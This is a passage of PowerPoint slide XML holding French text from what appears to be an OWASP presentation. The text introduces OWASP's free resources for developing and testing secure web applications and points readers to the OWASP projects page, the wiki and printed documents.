                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>une</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> application web </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>sécurisée</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>ou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>corriger</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>une</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> application </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>existante</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Lorsqu’en</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> plus </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>vous</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>devez</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>gérer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>nombreuses</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> applications, la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>tâche</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>devient</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>ardue</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Afin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>d’aider</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>organisations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> et les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>développeurs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>à</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>réduire</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>risques</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> au </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>sein</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>leurs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> applications web </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>à</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>moindre</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>coût</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>l’OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>créé</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>nombreuses</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>ressources</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>gratuites</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> et </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>ouvertes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>utilisables</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> au </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>sein</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>votre</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>organisation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. Les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>ressources</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> ci-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>dessous</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>sont</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> un </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>exemple</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>ce</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>que</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>l’OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>produit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> pour aider les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>organisations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>à</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>développer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> des applications web </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>sécurisées</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>D’autres</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>ressources</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>destinées</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>à</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>vous</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> aider </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>à</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>contrôler</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>sécurité</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>vos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> applications </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>sont</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>présentées</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>à</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> la page </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>suivante</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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De </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>nombreuses</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>autres</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>ressources</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>sont</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>disponibles</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Consultez</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>page des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>projets</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t> OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> qui les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>recense</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>organisés</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>selon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>leur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>niveau</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>maturité</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (Release Quality, Beta, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>ou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Alpha). La </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>plupart</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>ressources</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>sont</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>disponibles</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>sur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>wiki</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, et un grand </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>nombre</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de documents OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>peuvent</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>être</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>commandées</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> au format </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>papier</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a: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sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pour les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>développeurs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>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+D</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Diagram 5"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="980656046"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-914400" y="3048000"/>
          <a:ext cx="8763000" cy="5029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ustDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2093717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474756134"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="914400"/>
          <a:ext cx="6858000" cy="3779986"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="335746">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>Soyez</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>Organisé</a:t>
                      </a:r>
